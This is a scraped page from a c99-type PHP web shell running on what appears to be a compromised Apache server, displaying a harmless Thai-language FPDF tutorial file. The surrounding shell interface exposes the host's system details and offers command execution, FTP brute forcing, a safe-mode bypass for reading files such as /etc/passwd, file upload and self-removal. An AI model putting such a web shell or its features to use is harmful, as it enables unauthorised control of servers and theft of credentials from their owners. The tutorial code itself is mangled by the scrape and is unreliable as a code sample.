!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/ums/temp/tutorialTH/   drwxr-xr-x
Free 50.79 GB of 127.8 GB (39.74%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     tuto6.php (2.54 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
require('../fpdf_thai.php');

class 
PDF extends FPDF_TH
{
var 
$B;
var 
$I;
var 
$U;
var 
$HREF;

function 
PDF($orientation='P',$unit='mm',$format='A4')
{
    
//Call parent constructor
    
$this->FPDF($orientation,$unit,$format);
    
//Initialization
    
$this->B=0;
    
$this->I=0;
    
$this->U=0;
    
$this->HREF='';
}

function 
WriteHTML($html)
{
    
//HTML parser
    
$html=str_replace("\n",' ',$html);
    
$a=preg_split('/<(.*)>/U',$html,-1,PREG_SPLIT_DELIM_CAPTURE);
    foreach(
$a as $i=>$e)
    {
        if(
$i%2==0)
        {
            
//Text
            
if($this->HREF)
                
$this->PutLink($this->HREF,$e);
            else
                
$this->Write(5,$e);
        }
        else
        {
            
//Tag
            
if($e{0}=='/')
                
$this->CloseTag(strtoupper(substr($e,1)));
            else
            {
                
//Extract attributes
                
$a2=explode(' ',$e);
                
$tag=strtoupper(array_shift($a2));
                
$attr=array();
                foreach(
$a2 as $v)
                    if(
ereg('^([^=]*)=["\']?([^"\']*)["\']?$',$v,$a3))
                        
$attr[strtoupper($a3[1])]=$a3[2];
                
$this->OpenTag($tag,$attr);
            }
        }
    }
}

function 
OpenTag($tag,$attr)
{
    
//Opening tag
    
if($tag=='B' or $tag=='I' or $tag=='U')
        
$this->SetStyle($tag,true);
    if(
$tag=='A')
        
$this->HREF=$attr['HREF'];
    if(
$tag=='BR')
        
$this->Ln(5);
}

function 
CloseTag($tag)
{
    
//Closing tag
    
if($tag=='B' or $tag=='I' or $tag=='U')
        
$this->SetStyle($tag,false);
    if(
$tag=='A')
        
$this->HREF='';
}

function 
SetStyle($tag,$enable)
{
    
//Modify style and select corresponding font
    
$this->$tag+=($enable : -1);
    
$style='';
    foreach(array(
'B','I','U') as $s)
        if(
$this->$s>0)
            
$style.=$s;
    
$this->SetFont('',$style);
}

function 
PutLink($URL,$txt)
{
    
//Put a hyperlink
    
$this->SetTextColor(0,0,255);
    
$this->SetStyle('U',true);
    
$this->Write(5,$txt,$URL);
    
$this->SetStyle('U',false);
    
$this->SetTextColor(0);
}
}

$html='ตอนนี้คุณสามารถพิมพ์ข้อความง่ายๆ รวมกับรูปแบบที่หลากหลาย : 
<B>ตัวหนา</B>, <I>ตัวเอียง</I>, <U>ขีดเส้นใต้</U>, หรือ
<B><I><U>รวมทั้งหมด</U></I></B>!<BR>คุณสามารถที่จะแทรกการเชื่อมโยงบนข้อความ , ดังเช่น  
<A HREF="http://www.fpdf.org">www.fpdf.org</A>,
หรือบนรูปภาพ : คลิ๊กบนโลโก้ .'
;

$pdf=new PDF();
//First page
$pdf->AddPage();
$pdf->SetThaiFont();
$pdf->SetFont('AngsanaNew','',24);
$pdf->Write(5,'หาของอะไรใหม่ในการสอนพิเศษนี้ , คลิ๊ก ');
$pdf->SetFont('','U');
$link=$pdf->AddLink();
$pdf->Write(5,'ที่นี่',$link);
$pdf->SetFont('');
//Second page
$pdf->AddPage();
$pdf->SetLink($link);
$pdf->Image('logo.png',10,10,30,0,'','http://www.fpdf.org');
$pdf->SetLeftMargin(45);
$pdf->SetFontSize(20);
$pdf->WriteHTML($html);
$pdf->Output();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0155 ]--